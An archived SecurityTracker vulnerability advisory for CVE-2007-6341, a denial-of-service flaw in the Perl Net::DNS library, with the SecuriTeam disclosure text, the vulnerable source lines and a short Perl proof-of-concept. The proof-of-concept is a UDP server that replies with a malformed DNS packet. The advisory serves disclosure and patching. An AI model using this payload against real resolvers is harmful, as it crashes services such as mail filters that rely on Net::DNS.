SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Net DNS Vendors:  net-dns.org
Net::DNS Bug in Processing DNS Response Packets Lets Remote Users Deny Service
SecurityTracker Alert ID:  1019104
SecurityTracker URL:  http://securitytracker.com/id?1019104
CVE Reference:  CVE-2007-6341   (Links to External Site)
Date:  Dec 17 2007
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.60 build 654; possibly other versions
Description:  A vulnerability was reported in Net::DNS. A remote user can cause denial of service conditions.

A remote user can send specially crafted DNS response to potentially cause the target service to crash.

The vulnerability resides in 'Net/DNS/RR/A.pm'.

The vendor was notified on October 28, 2007.

Beyond Security reported this vulnerability, detected by beSTORM.
Impact:  A remote user can cause an application using Net::DNS to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.net-dns.org/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  SecuriTeam <support@securiteam.com>
Message History:   None.

 Source Message Contents
Date:  16 Dec 2007 11:30:56 +0200
From:  SecuriTeam <support@securiteam.com>
Subject:  [UNIX] Net::DNS Malformed Packet DoS

 
The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Net::DNS Malformed Packet DoS
------------------------------------------------------------------------


SUMMARY

 <http://www.net-dns.org/> Net::DNS is "a DNS resolver implemented in 
Perl. It allows the programmer to perform nearly any type of DNS query 
from a Perl script". beSTORM's DNS Server module has been able to detect a 
vulnerability in Net::DNS allows a malicious server to cause the Net::DNS 
package to crash by sending it a malformed DNS response, this in turn 
would cause any product using the package to crash with it.

DETAILS

Vulnerable Systems:
 * Net::DNS version 0.60 build 654

It is possible to cause Net::DNS to "croak" by responding to it with a 
malformed DNS response.

The croak itself doesn't allow you to overflow or execute arbitrary code, 
but as it cannot be captured using normal Perl code - as with an eval() 
function for example - a user of the Net::DNS package can be caused to 
"crash", his program to forcefully terminate if it encounters this DNS 
response.

The problem steams from the fact that:
if ($self->{"rdlength"} > 0) {
$self->{"address"} = inet_ntoa(substr($$data, $offset, 4));
 

found in Net/DNS/RR/A.pm

Doesn't properly verify that $$data has 4 bytes to read before attempting 
to substr - which in turn causes the data sent to inet_ntoa to not have 
enough bytes which causes this code:
ip_address = SvPVbyte(ip_address_sv, addrlen);
if (addrlen == sizeof(addr) || addrlen == 4)
addr.s_addr =
(ip_address[0] & 0xFF) << 24 |
(ip_address[1] & 0xFF) << 16 |
(ip_address[2] & 0xFF) << 8 |
(ip_address[3] & 0xFF);
else
croak("Bad arg length for %s, length is %d, should be %d", 
"Socket::inet_ntoa", addrlen, sizeof(addr));

To issue a "croak" - causing the perl to abort.

Severity:
The vulnerability itself doesn't pose any problem as Socket::inet_ntoa 
handles it as expected, seriousness of this vulnerability is caused by the 
fact that several other packages such as SpamAssassin and OTRS rely on 
Net::DNS for resolving hostnames - this could at the very least be a 
nuisance where an attacker can crash the daemons run by these two 
programs.

Vendor status:
We have reported this issue to Net::DNS 6 weeks ago:  
<https://rt.cpan.org/Public/Bug/Display.html?id=30316> Security issue with 
Net::DNS::Resolver, but no response has been received.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341> 
CVE-2007-6341

Exploit:
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module

use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die 
"socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";

my $oldmsg = 
"\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
 my($port, $ipaddr) = sockaddr_in($sock->peername);
 $hishost = gethostbyaddr($ipaddr, AF_INET);
 print "Client $hishost said ``$newmsg''\n";
 $sock->send($oldmsg);
 $oldmsg = "[$hishost] $newmsg";
 
die "recv: $!";


ADDITIONAL INFORMATION

The information has been provided by beSTORM.
The original article can be found at:  
<http://www.beyondsecurity.com/bestorm_overview.html> 
http://www.beyondsecurity.com/bestorm_overview.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC